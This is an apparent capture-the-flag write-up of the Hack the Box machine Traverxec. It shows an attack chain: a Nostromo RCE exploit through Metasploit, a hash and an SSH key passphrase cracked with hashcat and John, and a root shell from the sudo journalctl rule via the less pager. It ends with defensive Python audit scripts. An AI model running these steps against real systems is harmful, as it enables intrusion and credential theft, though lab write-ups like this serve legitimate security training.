Traverxec was an easy difficulty machine on Hack the Box. Here’s my take on solving the challenge

Traverxec

TL;DR: A vulnerable Nostromo web server can be exploited for RCE and a reverse shell. That gives access to a .htpasswd file whose hash, once cracked, yields the password for HTTP access to a protected folder in a user's home directory. From there it is possible to download a private key for SSH access as that user. Privilege escalation is done through a sudo NOPASSWD command that allows command execution when its output is longer than the console height (journalctl hands the output to less).

Recon

Nmap scan reveals that there’s an unusual HTTP server running:

# nmap traverexec.htb -sS -sV -n
-- snip --
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http nostromo 1.9.6
-- snip --

It turns out that there is a known RCE exploit for that server:

msf5 > search nostromo

Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/nostromo_code_exec 2019-10-20 good Yes Nostromo Directory Traversal Remote Command Execution

User

After setting up the necessary options, the exploit is ready to go:

Running LinEnum on the victim reveals a .htpasswd file:

[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

The password hash (md5crypt, hashcat mode 500) can be cracked using hashcat:

# hashcat64.exe hashes.txt -m 500 -a 0 rockyou.txt
-- snip --
$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me
-- snip --

/var/nostromo/conf also contains the nhttpd.conf file, with the following entry:

# HOMEDIRS [OPTIONAL]
homedirs  /home
homedirs_public public_www

That means Nostromo serves the public_www subfolder of each user's home directory (as /~user/), so that folder has to be readable by www-data:

$ ls /home/david/public_www -la
ls /home/david/public_www -la
total 16
drwxr-xr-x 3 david david 4096 Oct 25 15:45 .
drwx--x--x 6 david david 4096 Nov 19 13:46 ..
-rw-r--r-- 1 david david 402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Oct 25 17:02 protected-file-area
$ ls /home/david/public_www/protected-file-area -la
ls /home/david/public_www/protected-file-area -la
total 16
drwxr-xr-x 2 david david 4096 Oct 25 17:02 .
drwxr-xr-x 3 david david 4096 Oct 25 15:45 ..
-rw-r--r-- 1 david david 45 Oct 25 15:46 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25 17:02 backup-ssh-identity-files.tgz
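The listing above shows exactly what the homedirs directives expose. As an added example (not from the write-up), the following Python audit parses the two nhttpd.conf directives, walks each user's public directory and reports every world-readable file together with its URL path, flagging archive and key names; the directory tree it audits is constructed in a temp dir to mirror the box, and the `/~user/` URL mapping and parent-directory search bits are assumptions.

```python
import re
import stat
import tempfile
from pathlib import Path

SENSITIVE = re.compile(r"\.(tgz|tar|gz|zip|bak|key|pem)$|id_rsa|htpasswd", re.I)

def parse_homedirs(conf_text):
    """Return (homedirs, homedirs_public) from nhttpd.conf, None if unset."""
    found = {}
    for line in conf_text.splitlines():
        parts = line.split("#", 1)[0].split()      # strip comments
        if len(parts) == 2 and parts[0] in ("homedirs", "homedirs_public"):
            found[parts[0]] = parts[1]
    if "homedirs" not in found:
        return None
    return found["homedirs"], found.get("homedirs_public", "")

def exposed_files(conf_text, root="/"):
    """List (url_path, looks_sensitive) for each world-readable file under every
    user's public dir; `root` lets the audit run on a staged tree (assumption)."""
    if (parsed := parse_homedirs(conf_text)) is None:
        return []
    homedirs, public = parsed
    base = Path(root) / homedirs.lstrip("/")
    results = []
    for home in sorted(p for p in base.iterdir() if p.is_dir()):
        pub = home / public if public else home
        if not pub.is_dir():
            continue
        for f in sorted(pub.rglob("*")):           # pathlib globs include dotfiles
            if f.is_file() and f.stat().st_mode & stat.S_IROTH:
                url = f"/~{home.name}/" + f.relative_to(pub).as_posix()
                results.append((url, bool(SENSITIVE.search(f.name))))
    return results

def demo():
    """Stage a constructed tree mirroring the write-up and audit it."""
    tmp = Path(tempfile.mkdtemp())
    area = tmp / "home/david/public_www/protected-file-area"
    area.mkdir(parents=True)
    for name, data in [("index.html", b"<h1>hi</h1>"),
                       ("protected-file-area/.htaccess", b"# placeholder\n"),
                       ("protected-file-area/backup-ssh-identity-files.tgz", b"\x1f\x8b")]:
        path = area.parent / name
        path.write_bytes(data)
        path.chmod(0o644)                          # world-readable, as on the box
    conf = "# HOMEDIRS [OPTIONAL]\nhomedirs  /home\nhomedirs_public public_www\n"
    return exposed_files(conf, root=tmp)
```

Run against a real host as root with `root="/"` and the actual nhttpd.conf text; any flagged entry is a file the web server will hand to anyone who can satisfy the .htaccess realm, so it does not belong under public_www at all.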

backup-ssh-identity-files.tgz contains an SSH private key:

$ cp /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz /tmp/.

$ tar -xvzf backup-ssh-identity-files.tgz

home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub

$ cd home/david/.ssh/


$ ls -la

total 20
drwx------ 2 www-data www-data 4096 Oct 25 17:02 .
drwxr-xr-x 3 www-data www-data 4096 Nov 19 14:35 ..
-rw-r--r-- 1 www-data www-data 397 Oct 25 17:02 authorized_keys
-rw------- 1 www-data www-data 1766 Oct 25 17:02 id_rsa
-rw-r--r-- 1 www-data www-data 397 Oct 25 17:02 id_rsa.pub
$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F
seyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG
-- snip --

The key passphrase can be cracked with John the Ripper:

# ssh2john.exe key.txt > key2.txt
# john.exe key2.txt --wordlist=rockyou.txt
-- snip --
Use the "--show" option to display all of the cracked passwords reliably
Session completed
# john.exe key --show
-- snip --
key.txt:hunter
1 password hash cracked, 0 left

Now it's possible to log in as david over SSH and grab the user flag:

# ssh david@traverexec.htb -c aes256-ctr -i id_rsa
Enter passphrase for key 'id_rsa': hunter
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Tue Nov 19 14:43:37 2019 from 10.10.14.14
david@traverxec:~$ cat user.txt
7db...

Privilege escalation

In david's bin folder there's an interesting script suggesting that journalctl can be run with sudo without a password:

david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

journalctl pipes its output through less when the output doesn't fit the screen, and less can run shell commands, so the sudo rule can be abused for command execution as root. The -n5 argument limits the amount of output, so the console has to be shrunk until the five journal lines no longer fit. Then less can be used to spawn a root shell:

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2019-11-19 11:57:32 EST, end at Tue 2019-11-19 15:10:06 EST. --
Nov 19 14:22:23 traverxec sudo[1233]: pam_unix(sudo:auth): authentication failure; logname= uid=33 eui
-- snip --
!/bin/bash
root@traverxec:/home/david/bin# cat /root/root.txt
9aa...
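The root cause is a NOPASSWD rule for journalctl that does not pin --no-pager. As an added example (not from the write-up), this Python check scans sudoers text for such rules and proposes the pinned replacement; sudoers matches command arguments literally, so a rule listing --no-pager cannot be invoked without it. The sudoers content is constructed, not the machine's real file.

```python
import shlex

# Commands that hand output to $PAGER unless told not to; only the one on this page.
PAGER_COMMANDS = {"journalctl": "--no-pager"}


def audit_sudoers(text):
    """Return one finding per NOPASSWD command that may start a pager as root.

    Each finding carries the rule as written and a pinned replacement. Keep
    `Defaults env_reset` (sudo's default) as well, so the caller cannot
    smuggle PAGER or SYSTEMD_PAGER into the root environment."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line.startswith("Defaults") or "NOPASSWD:" not in line:
            continue
        user = line.split()[0]
        for cmd in line.split("NOPASSWD:", 1)[1].split(","):
            argv = shlex.split(cmd)
            if not argv:
                continue
            flag = PAGER_COMMANDS.get(argv[0].rsplit("/", 1)[-1])
            if flag and flag not in argv[1:]:
                findings.append({
                    "user": user,
                    "command": " ".join(argv),
                    "fix": " ".join([argv[0], flag] + argv[1:]),
                })
    return findings


# Constructed sample; not the machine's real /etc/sudoers.
SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
david ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
"""

if __name__ == "__main__":
    for f in audit_sudoers(SUDOERS):
        print(f"{f['user']}: {f['command']}\n    -> {f['fix']}")
```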